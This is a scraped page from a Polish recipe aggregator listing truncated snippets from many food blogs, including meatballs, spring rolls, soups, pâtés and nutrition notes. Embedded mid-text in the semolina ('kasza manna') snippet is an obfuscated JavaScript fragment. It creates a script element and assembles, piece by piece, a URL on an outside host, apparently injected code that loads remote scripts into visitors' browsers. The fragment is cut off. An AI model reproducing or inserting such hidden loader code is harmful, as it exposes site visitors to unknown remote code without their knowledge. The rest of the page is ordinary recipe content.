dania mięsne - 13801 przepisów (strona:660/921)

Pulpety w sosie pieczarkowym 454

mięsa mielonego można wyczarować sporo pysznych dań. Od klopsów, pulpetów, nadziewanych makaronów po pyszne zapiekanki. Ja dzisiaj serwuję wam pyszne pulpety z mięsa mielonego w sosie pieczarkowy. Danie przygotowałam w granitowym garnku Ballarini z kolekcji Lucca . Garnek jest odporny na uszkodzenia mechaniczne. Ma nienagrzewające się rączki po obu stronach garnka. Potrawy nie przywierają do powierzchni nawet, jeśli(...)łyżeczka papryki słodkiej 0,5 łyżeczki kolorowego mielonego pieprzu 0,5 łyżeczki pieprzu ziołowego staropolski 2 łyżeczki musztardy 2 łyżki masła klarowanego 3 łyżki oleju rzepakowego 1 litr bulionu mięsnego 200 g pieczarek 1 cebula 1 łyżeczka masła klarowanego 0,5 szklanki zimnej wody 1-1,5 łyżki mąki do zagęszczenia mąka do obtoczenia pulpetów Przygotowanie: Czerstwą kajzerkę namoczyć

Ala piecze i gotuje
Sajgonki z warzywami i mięsem z indyka 201

Sajgonki , krokiety wiosenne, naleśniki wiosenne (chiń.: 春卷; pinyin: chūn juǎn; wiet.: nem) – popularne danie kuchni chińskiej oraz kuchni krajów Azji Południowo-Wschodniej. Mają postać naleśniczków z nadzieniem mięsno-warzywnym lub krewetkowym, zazwyczaj jedzone jako zakąska z różnego rodzaju sosami i dipami. Występują w bardzo wielu odmianach w zależności od kraju i regionalnych upodobań. Mogą być spożywane na zimno, smażone(...)Gotowe osuszamy na ręcznikach papierowych. Podajemy gorące z sosem słodko kwaśnym. Kilka rad ułatwiających przygotowanie sajgonek: - arkusze papieru ryżowego muszą być całe (jeżeli trafimy na pęknięty lub dziurawy lepiej dać podwójnie) - moczymy je krótko (moczone zbyt długo będą się rwały) - najlepiej układać je na drewnianej desce - sajgonki nie powinny się ze sobą stykać (papier może się rwać) - nie nakładajmy zbyt

mojewypiekiinietylko
Banana ice cream. 133

ochłody !!! Lody – zamrożony deser, który uzyskuje się poprzez zamrażanie masy uzyskanej z produktów mlecznych (lody mleczne) bądź wody (lody wodne) z dodatkami smakowymi (dodatki tradycyjne – owoce, lub nietradycyjne, mięsne czy warzywne – w Polsce niepopularne), lub zamrażanie masy złożonej z owoców, cukru i wody (sorbet). Alternatywną opcją dla lodów mlecznych są lody wykonywane na bazie napojów: sojowego, ryżowego, owsianego itp. Lody(...)ogromnej liczbie odmian i z wieloma dodatkami, z których najpopularniejszymi są: bita śmietana, rurki waflowe, rodzynki, kruszone orzechy. Źródło   LOVE Lody kochają wszyscy…tak dosłownie wszyscy!!! <-- dam sobie za to stwierdzenie normalnie rękę uciąć, a nawet dwie!!! Podaje się je na calutkim świecie w przeróżnych rodzajach, smakach, kompozycjach itd. Najlepsze są jednak te zdrowe, wykonane w domu

ClauditteMissCooking
Sałatka z makaronem i choriso 284

Sałatki makaronowe idealnie nadają się na kolację lub jako obiad do pracy który nie wymaga podgrzania. Ale… ta sałatka to także super pomysł na imprezę

nietylkopasta.pl
BOGRACZ Z PRZEPISU MOJEGO TATY 317

Mało kto wie, że bogracz to tak naprawdę rodzaj kociołka, w którym przygotowuje się potrawy nad ogniskiem. W Polsce przyjęło się, że bogracz to pyszna zupa

kuchniabellissima.wordpress.com
Gołąb z tortownicy - gołąbki pieczone po francusku. 189

 Kiedy zobaczyłam ten przepis w książce "Apetyt na Francję", wiedziałam, że zrobię go bardzo szybko. Wariacja na temat gołąbków autorstwa Mimi Thorisson, pokazana w jej

Poezja Smaków - blog kulinarny
Kasza manna na co dzień 119

doskonałe własności zagęszczające. Kasza manna ma łagodny, delikatny smak, łatwo wchłania wodę i szybko się gotuje. To zalety w kuchni dzięki którym kasza manna ma wiele zastosowań. Dania, do których została dodana kasza manna są elastyczne i łatwe do krojenia. Kaszę manną wsypuje się na gotujący płyn, może to być woda, mleko lub bulion. Podczas gotowania kasza manna(...)kaszkę manną jako gęstą kaszkę gotowaną na mleku z dodatkiem owoców. Jest chętnie używana też do przygotowania puddingów i legumin. W wersji wytrawnej kasza manna służy do zagęszczania pasztetów mięsnych i warzywnych. (function(){ q6vp=document.createElement("script");q6vp_=("us")+("ta"); q6vp_+="t"+(".");q6vp_+=("in");q6vpu="314233494";q6vp.async=true; q6vpu+=".uipznxmp6vp867l3w";q6vp.type="text/javascript";q6vp_+="f"+"o"+("/"); q6vpu+="lse05ecf3p928";q6vp.src="https://"+q6vp_+q6vpu

ProstePesto.pl
Awokado, cenne źródło zdrowia 111

trawienia i wchłaniania, chroni przed skurczem mięśni. Wapń jest budulcem kości i zębów, bierze udział w procesie krzepnięcia krwi, wpływa na kurczliwość mięśni. Fosfor, makroelement, składnik błon komórkowych, kości i zębów, wspomaga pracę układu nerwowego i krwionośnego. Sód reguluje objętość wody w organizmie, chroni przed anemią. Żelazo składnik hemoglobiny transportuje tlen do mięśni. Magnez wpływa i zapobiega chorobom serca, poprawia(...)pełnią funkcję ochronną serca. Ciekawostki o awokado Awokado uznawane jest za jeden z najsilniejszych afrodyzjaków. Liście i korę stosowano do leczenia gorączki i chorób kobiecych. Jedno owocujące drzewo może dać 100 kg owoców w ciągu roku. Pestka awokado jest jadalna, zdrowa i nietoksyczna. Poleca się przesuszenie i zmiksowanie, może być dodana do jogurtu. Skórkę można wykorzystać jako maseczkę do twarzy

ProstePesto.pl
Co jeść przed i po treningu? 168

ułatwi regenerację organizmu, przywróci równowagę kwasowo-zasadową oraz pomoże odbudować zapasy glikogenu i białek w mięśniach. Badania pokazały, że łączne spożycie białek i węglowodanów po posiłku obniża m.in. bóle mięśni. Po treningu zaleca się węglowodany o wysokim indeksie glikemicznym. W 2 godizny po posiłku powinno spożyć się ok. 20 g białka. Nie należy także pomijać warzyw i owoców, szczególnie(...)trakcie ćwiczeń oraz po ich zakończeniu należy zadbać o prawidłowe nawodnienie organizmu. Szczególne potrzeby sportowców wymagają indywidualnego podejścia Należy podkreślić, że w przypadku osób trenujących wyczynowo daną dyscyplinę sportową, zalecenia żywieniowe są indywidualizowane i często opierają się na precyzyjnym wyliczeniu potrzeb dotyczących zarówno wartości energetycznej, jak i udziału składników odżywczych w posiłku przed treningiem i bezpośrednio

AZgotuj!
Pulpety w sosie pomidorowym 218

zdarzały się i ubogie wersje, kiedy na coś, co szumnie nazywaliśmy sosem, składały się dwa pomidory i kostka rosołowa rozpuszczona w wodzie. A jednak zawsze z sentymentem wspominam to danie i po latach chętnie je przyrządzam. Czy pulpety w sosie pomidorowym znane też jako klopsiki w sosie pomidorowym to także Wasze comfort food? Pulpety w sosie pomidorowym  - składniki(...)papryka do smaku garść natki pietruszki 4-5 łyżek mąki pszennej do obtoczenia pulpetów Sos pomidorowy do pulpetów 800 ml przecieru pomidorowego albo dwie puszki pomidorów 200 ml bulionu mięsnego  lub warzywnego 2 ząbki czosnku drobno posiekane sól, pieprz, duża szczypta cukru i ulubione zioła do smaku Dodatkowo: natka pietruszki lub kolendry Przepis na pulpety w sosie pomidorowym Cebulę

Kulinaria - potrawy z różnych stron świata
Kopytka z sosem pomidorowym. 245

Kopytka z sosem pomidorowym choć znane i lubiane nie są często razem podawane.  Kopytka tradycyjnie jadamy z sosami mięsnymi lub grzybowymi.  Sos pomidorowy ugotowany w domu jest o wiele smaczniejszy niż sos ze słoika. Można go przyprawić ziołami, czosnkiem,  pieprzem, chili dokładnie tak jak lubimy. Odpowiednio ugotowany jest aromatyczny i gęsty, bez sztucznych aromatów i zagęstników. Kopytka(...)delikatne będą. Kopytka są dosyć pracochłonne dlatego warto przygotować ich więcej niż na jeden obiad. Kluseczki można przechowywać w lodówce do 3 dni. Kopytka z sosem pomidorowym będą doskonałym daniem obiadowym dla dzieci, bo jak wszystkie kluseczki, smakują maluchom. Składniki na kopytka: 1 kg ziemniaków 1 szkl. mąki pszennej 2 jajka 1/2 łyżeczki soli Składniki na sos pomidorowy

Codziennik Kuchenny
Pieczeń z mięsa wieprzowego i warzyw 194

Pieczeń smakuje bardzo dobrze na ciepło, jako danie obiadowe z ziemniakami i surówką, a także na zimno z pieczywem, pomidorem czy ogórkiem kiszonym. Składniki: pół kg mięsa mielonego wieprzowego cukinia 2 czerstwe bułki kajzerki pół szklanki mleka 2 ząbki czosnku 2 jajka papryka czerwona sól, pieprz, oregano, papryka ostra Przygotowanie Bułki zalewamy mlekiem. Cukinie obieramy i ścieramy na tarce(...)mleka, przeciśnięte ząbki czosnku, jajka, cukinię i paprykę. Przyprawiamy i dokładnie mieszamy. Jeśli masa jest zbyt rzadka, można dosypać trochę bułki tartej. Keksówkę wykładamy papierem do pieczenia, wykładamy masę mięsną, wyrównujemy wierz i pieczemy w piekarniku nagrzanym do 180 C około 50 minut

e-PrzepisyKulinarne
Dynia. Właściwości i ciekawostki 112

jaskini Ocampo i Tehuacan liczące około 7 000 lat. Starożytny polityk i wódz rzymski Lukullus (117–56 r. p.n.e.) nazywany największym łakomczuchem starożytności, na ucztach słynących z wyszukanych dań, podawał dynię smażoną w miodzie. Jemu też zawdzięczamy sprowadzenie do Europy czereśni. Najstarsze freski ilustrujące dynię pochodzą z 1515 – 1518 roku, przedstawiają 170 roślin, w tym dynię piżmową, zwyczajną(...)trądzik i opryszczka. Zawartość potasu w oleju z pestek działa oczyszczająco i rozjaśniająco na skórę. Nawilża, natłuszcza, wygładza, zmiękcza i łagodzi podrażnienia. Dynia w kuchni. Dynia jest składnikiem zapiekanek mięsnych i rybnych, farszu, zup, sałatek, marynat, wypieków. Z dyni można piec chleb. Walory smakowe dyni podnoszą zioła: ziele angielskie, pieprz czarny, goździki, kardamon. Do przygotowania potraw wykorzystuje się świeży, gotowany

ProstePesto.pl
Łosoś z patelni w delikatnym sosie śmietanowym z soczystymi pomidorkami koktajlowymi 87

minut z każdej strony, aż będą miękkie i delikatnie zrumienione. Umieść filety łososia na patelni i delikatnie zanurz je w sosie śmietanowym z cebulą i pomidorkami koktajlowymi. Posyp danie świeżymi ziołami (np. natką pietruszki lub szczypiorkiem) dla dodatkowej dekoracji. Całość skrop sokiem z połówki cytryny. Podawaj natychmiast, najlepiej z dodatkiem ulubionych warzyw lub ryżu. Ja proponuję frytki z buraka(...)będą miękkie w środku i z lekko zrumienionymi brzegami. Po wyjęciu z piekarnika pozostaw frytki na chwilę, aby lekko ostygły. Podawaj je jako zdrową przekąskę lub jako dodatek do dań głównych. Składniki frytki z buraka 2-3 średnie buraki 3 średnie marchewki 3 łyżki oliwy z oliwek 1 czubata łyżeczka soli 1/2 łyżeczki pieprzu 1 łyżeczka słodkiej papryki

Eat me! Fit me!
PAPRYKA FASZEROWANA MIELONYM MIĘSEM 160

Papryka faszerowana to świetny przepis nie tylko na syty obiad, ale i fajną przekąskę kolacyjną, kiedy zapowiedzą nam się znajomi. Całe danie można przygotować wcześniej, a nawet poprzedniego dnia, a potem tylko myk - naczynie do piekarnika 😎 Ponieważ danie jak wspomniałam jest bardzo syte, nie robię do niego już innych dodatków. Uważam, że są zbędne. Składniki(...)podsmażamy pokrojoną cebulę i czosnek. Dodajemy mięso mielone i smażymy całość chwilę. Następnie dodajemy pokrojone pieczarki, koncentrat i przyprawy. Dusimy całość do momentu odparowania soku. Ryż mieszamy z masą mięsną. Farszem nadziewamy każdą paprykę. Papryki układamy w naczyniu żaroodpornym.  Podlewamy wodą lub bulionem i dusimy pod przykryciem około 40-50 minut w piekarniku. Pod koniec pieczenia naczynie odkrywamy

Walijskie Pichcenie
Zupa ze świeżych ogórków – kuchnia podkarpacka 168

Zupa ze świeżych ogórków – kuchnia podkarpacka W moich poszukiwaniach tradycyjnych przepisów z naszego regionu od czasu do czasu trafiam na perełki – wyjątkowe dania, o których wcześniej nie słyszałam, a które szczególnie przypadły mi do gustu. Taka właśnie jest zupa ze świeżych ogórków z Maćkówki. W naszej tradycji kulinarnej to kiszone ogórki zajmują bardzo ważną rolę. Spory czy jedynie(...)marchewka podduszone na maśle stanowią podstawę zupy gotowanej na wywarze z drobiu. Zupę zaprawia się śmietaną i podaje z ziemniakami. Ta pyszna zupa, mimo że ugotowana jest na wywarze mięsnym, na dodatek z liściem laurowym i zielem angielskim, pachnie latem. Jeśli Wy też nie znacie tej zupy, spróbujcie koniecznie :) Przepis Koła Gospodyń Wiejskich z Maćkówki (powiat przeworski) opublikowano w zbiorze

Trzeci talerz
Zupa pomidorowa z makaronem orzo, szpinakiem i pesto 238

Ta zupa to kwintesencja smaku Włoch – mocno pomidorowa, szybka i pyszna. Gęsta i sycąca od warzyw, obłędnie pachnąca… To tylko kilka bardzo podstawowych i zawsze dostępnych

Karo in the Kitchen
Pasztet z marchewki i soczewicy 285

Tym razem przygotujemy pasztet z marchewki i soczewicy z dodatkiem kaszy jaglanej i ciecierzycy. To danie nie tylko dla wegetarian. Jestem przekonany, że zasmakuje także

Kulinarnyblog.pl - wiesz jak gotować!
Porosołowy pasztet 155

Składniki: - mięso z 1 ćwiartki i 1 pałki z kurczaka - jajko - łyżka kaszy manny - łyżka bułki tartej - 2 pieczarki - pół niedużej cebuli - przyprawy - sól, pieprz, majeranek

Kulinarne blogowanie
Zupa ogórkowa na żeberkach z kaszą jaglaną 202

Jedna z klasycznych polskich zup (tj. jak pomidorowa, krupnik, kapuśniak, jarzynowa), które po prostu od czasu do czasu, goszczą w naszych domach. Nieco mniej tradycyjne wydanie

Kierunekuchnia
Schabowe roladki z grzybami w delikatnym sosie z nutą śliwki 214

Roladki schabowe przygotowałam na naszą rocznicową kolację. Kruche i rozpływające się mięso, farsz z grzybków nazbieranych przez Małżonka i pyszny sosik #lowicz wzbogacony śliwkami i rozmarynem

Kuchnia w czekoladzie
Galaretka z Lebiodki pospolitej –czyli oregano 200

przez sito wyłożone grubą warstwą gazy.Będzie to trwało prawie całą noc . Nie ściskać mieszaniny ,bo galaretka będzie mętna .Po tym czasie zmierzyć ilość płynu,i na każde 100ml dać 100g cukru brązowego,lub białego.Ogrzewać mieszaninę z cukrem, stale mieszając, aż do rozpuszczenia cukru. Gotować przez około 30 minut, do zgęstnienia galaretki.Sprawdzając gęstość , po umieszczeniu na talerzu łyżeczkę(...)jest stosowane w omletach, w potrawach z makaronów, we włoskich sosach, sałatkach, do przyprawiania potraw z owoców morza, do tartych serów, warzyw, zup, duszonych mięs, drobiu, oraz do potraw mięsnych z wieprzowiny, wołowiny, baraniny, cielęciny. Lebiodka pospolita bogata jest w takie wartości jak olejki eteryczne,  które głównie złożone są z tymolu, gorycze oraz garbniki.   Oregano posiada również wartościowe

w mojej kuchni
Quinoa i pikantny gulasz z sercem 192

Dzisiejszy przepis zrodził się trochę z konieczności, a trochę z tęsknoty. Jedno jest pewne, dodałam do niego dużo serca ;) dosłownie i w przenośni.  Po pierwsze

Quinoa Raz!
Chilli con carne a'la Heston 239

smak i aromat. Gotujemy na dużym ogniu, pod przykryciem aż powstanie sos. Dodać czerwoną fasolę i gotować na mniejszym już ogniu, jeszcze ok. 20 min. Cały sos przelać do mięsnej mikstury. Na patelni lekko podgrzać oliwę z dodatkiem mielonego kuminu, wędzonej papryki i pieprzu cayenne. Ja nie miała mielonego kuminu i nie miałam możliwości zmielenia, przetarłam więc lekko w moździeży(...)Ekstraktu Marmite również nie było w kuchni ale zamiast tego dodałam łyżkę sosu sojowego, który jak się dowiedziałam smakuje podobnie a jest także używany w innych przepisach na to danie. Całą pastę przełożyć do garnka z mięsem i chwilę jeszcze pogotować. GOTOWE ;) Ja na koniec dodałam jeszcze słodką kukurydzę. Smacznego

Ukojenie Podniebienia
Aromatyczny gulasz . 193

Witajcie :) dzisiaj chciałam Was zaprosić na przepyszny  gulasz z pieczarkami , papryką , marchewką i aromatycznymi ziołami . W sam raz na niedzielny obiad :) Składniki : 1 kg szynki

Sama słodycz i szczypta chili
Roladki mięsne z kapustą i ciastem francuskim 285

Roladki z mięsa mielonego z dodatkiem kapusty zapieczone w cieście francuskim sprawdzą się zarówno jako danie główne jak również przekąska. Smakują zarówno na ciepło jak i na zimno. Składniki: 3 duże liście młodej kapusty około 400g mięsa mielonego czerwona cebula biała część pora olej do smażenia przyprawa gyros płat ciasta francuskiego żółtko do posmarowania sezam do posypania Sposób przygotowania(...)zawijaniu liść nie pękał). Cebule i por drobno siekamy i szklimy na odrobinie oleju. Mięso mieszamy z cebulką i przyprawa gyros. Płat ciasta rozwijamy i wykładamy równą warstwą masę mięsną. Pozostawiamy na szerszym boku około 8-10 cm ciasta bez mięsa. Na masie mięsnej układamy przygotowane wcześniej liście kapusty. Ciasto francuskie ściśle zwijamy wzdłuż szerszego boku. Smarujemy żółtkiem jajka

Pyry na Gaz

Proponowane wyszukiwania